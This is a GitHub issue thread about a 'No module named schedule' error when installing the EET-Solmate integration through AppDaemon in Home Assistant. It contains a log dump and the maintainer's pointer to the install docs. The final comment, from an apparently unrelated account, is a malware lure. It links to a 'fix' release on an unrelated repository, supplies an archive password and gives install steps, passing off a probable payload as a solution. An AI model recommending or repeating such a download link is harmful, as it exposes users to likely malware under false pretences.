mmattel/EET-Solmate #86: `No module named 'schedule'` when trying to install using AppDaemon

tht, 2024-08-28:
Hi,

I'm still waiting for my SoulMate but this does not prevent me from trying to install the integration in Home-Assistant 😄. I do not have any AppDaemon experience and I'm struggling during the install process. I'm quite sure I've missed something somewhere.

- AppDaemon is installed as Home-Assistant Add-On
- Long-Lived Auth-Token is configured and AppDaemon is able to connect to Home-Assistant according to the logs
- `logs:` and `apps:` are added to the corresponding config-files.
- I've created the `esham` directory and copied all the files matching `solmate*.py`
- `.env_0` is created and filled with MQTT configuration (remember, I don't have the SoulMate yet so no serial available)

When starting AppDaemon I get this output:
```
[19:22:32] INFO: Starting AppDaemon...
s6-rc: info: service legacy-services successfully started
2024-08-28 19:22:40.365034 INFO AppDaemon: AppDaemon Version 4.4.2 starting
2024-08-28 19:22:40.365589 INFO AppDaemon: Python version is 3.11.9
2024-08-28 19:22:40.366037 INFO AppDaemon: Configuration read from: /config/appdaemon.yaml
2024-08-28 19:22:40.366529 INFO AppDaemon: Added log: AppDaemon
2024-08-28 19:22:40.366987 INFO AppDaemon: Added log: Error
2024-08-28 19:22:40.367406 INFO AppDaemon: Added log: Access
2024-08-28 19:22:40.367784 INFO AppDaemon: Added log: Diag
2024-08-28 19:22:40.368170 INFO AppDaemon: Added log: Soulmate_Log_0
2024-08-28 19:22:40.835789 INFO AppDaemon: Loading Plugin HASS using class HassPlugin from module hassplugin
2024-08-28 19:22:41.628540 INFO HASS: HASS Plugin Initializing
2024-08-28 19:22:41.629450 INFO HASS: HASS Plugin initialization complete
2024-08-28 19:22:41.631695 INFO AppDaemon: Initializing HTTP
2024-08-28 19:22:41.634194 INFO AppDaemon: Using 'ws' for event stream
2024-08-28 19:22:41.654588 INFO AppDaemon: Starting API
2024-08-28 19:22:41.666135 INFO AppDaemon: Starting Admin Interface
2024-08-28 19:22:41.668090 INFO AppDaemon: Starting Dashboards
2024-08-28 19:22:42.100537 INFO HASS: Connected to Home Assistant 2024.8.3
2024-08-28 19:22:42.228046 INFO AppDaemon: App 'hello_world' added
2024-08-28 19:22:42.231075 INFO AppDaemon: App 'solmate_0' added
2024-08-28 19:22:42.233862 INFO AppDaemon: Found 2 active apps
2024-08-28 19:22:42.234721 INFO AppDaemon: Found 0 inactive apps
2024-08-28 19:22:42.235397 INFO AppDaemon: Found 0 global libraries
2024-08-28 19:22:42.236115 INFO AppDaemon: Starting Apps with 2 workers and 2 pins
2024-08-28 19:22:42.238570 INFO AppDaemon: Running on port 5050
2024-08-28 19:22:42.346712 INFO HASS: Evaluating startup conditions
2024-08-28 19:22:42.361141 INFO HASS: Startup condition met: hass state=RUNNING
2024-08-28 19:22:42.362008 INFO HASS: All startup conditions met
2024-08-28 19:22:42.439314 INFO AppDaemon: Got initial state from namespace default
2024-08-28 19:22:43.623289 INFO AppDaemon: New client Admin Client connected
2024-08-28 19:22:44.252378 INFO AppDaemon: Scheduler running in realtime
2024-08-28 19:22:44.290924 INFO AppDaemon: Adding /config/apps to module import path
2024-08-28 19:22:44.292662 INFO AppDaemon: Adding /config/apps/soulmate to module import path
2024-08-28 19:22:44.354255 INFO AppDaemon: Loading App Module: /config/apps/hello.py
2024-08-28 19:22:44.502073 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_websocket.py - ignoring
2024-08-28 19:22:44.504677 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_appdmonitor.py - ignoring
2024-08-28 19:22:44.507881 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_appdsolmate.py - ignoring
2024-08-28 19:22:44.510344 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_ha_config.py - ignoring
2024-08-28 19:22:44.514422 INFO AppDaemon: Loading App Module: /config/apps/soulmate/solmate_appdaemon_0.py
2024-08-28 19:22:44.642861 WARNING Error: ------------------------------------------------------------
2024-08-28 19:22:44.644248 WARNING Error: Unexpected error loading module: /config/apps/soulmate/solmate_appdaemon_0.py:
2024-08-28 19:22:44.645460 WARNING Error: ------------------------------------------------------------
2024-08-28 19:22:44.663007 WARNING Error: Traceback (most recent call last):
  File "/usr/lib/python3.11/site-packages/appdaemon/app_management.py", line 1000, in check_app_updates
    await utils.run_in_executor(self, self.read_app, mod["name"], mod["reload"])
  File "/usr/lib/python3.11/site-packages/appdaemon/utils.py", line 304, in run_in_executor
    response = future.result()
               ^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/concurrent/futures/thread.py", line 58, in run
    result = self.fn(*self.args, **self.kwargs)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/site-packages/appdaemon/app_management.py", line 783, in read_app
    self.modules[module_name] = importlib.import_module(module_name)
                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<frozen importlib._bootstrap>", line 1204, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1176, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1147, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 690, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 940, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "/config/apps/soulmate/solmate_appdaemon_0.py", line 5, in <module>
    import solmate_appdsolmate as sol_appd_solmate
  File "/config/apps/soulmate/solmate_appdsolmate.py", line 1, in <module>
    import solmate_main as sol_main
  File "/config/apps/soulmate/solmate_main.py", line 5, in <module>
    import schedule
ModuleNotFoundError: No module named 'schedule'

2024-08-28 19:22:44.664250 WARNING Error: ------------------------------------------------------------
2024-08-28 19:22:44.665830 WARNING AppDaemon: Removing associated apps:
2024-08-28 19:22:44.667551 WARNING AppDaemon: solmate_0
2024-08-28 19:22:44.672196 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_importmanager.py - ignoring
2024-08-28 19:22:44.683732 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_utils.py - ignoring
2024-08-28 19:22:44.686708 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_connect.py - ignoring
2024-08-28 19:22:44.690647 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_main.py - ignoring
2024-08-28 19:22:44.693356 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate.py - ignoring
2024-08-28 19:22:44.696968 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_env.py - ignoring
2024-08-28 19:22:44.699772 WARNING AppDaemon: No app description found for: /config/apps/soulmate/solmate_mqtt.py - ignoring
2024-08-28 19:22:44.702666 INFO AppDaemon: Loading app hello_world using class HelloWorld from module hello
2024-08-28 19:22:44.708794 INFO AppDaemon: Calling initialize() for hello_world
2024-08-28 19:22:44.781223 INFO hello_world: Hello from AppDaemon
2024-08-28 19:22:44.783811 INFO hello_world: You are now ready to run Apps!
2024-08-28 19:22:44.786343 INFO AppDaemon: App initialization complete
```

It looks like the Python modules are not available. As per documentation the `requirements.txt` is not needed in AppDaemon installations. But where does AppDaemon get the information about the modules from? Did I miss a step?

Thanks!

mmattel, 2024-08-28:
Congrats deciding for a Solmate 😃

Yes, you misread one point, maybe you are just too excited and eager to get it 🤣. You need to add the required libraries listed in requirements.txt into appdaemon, see: https://github.com/mmattel/EET-Solmate/blob/main/docs/appdaemon.md#install-appdaemon-as-addon
This is quite easy, just not forget to restart appdaemon afterwards...

Let me know how it went.

closed 2024-08-28 by tht

mmattel, 2024-08-28:
Great 😃
Have a lot of fun.
Let me know if there is anything open. Feedback welcomed, really 😅 or how you use it. Just drop a note in the discussions section.

64dB0y, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."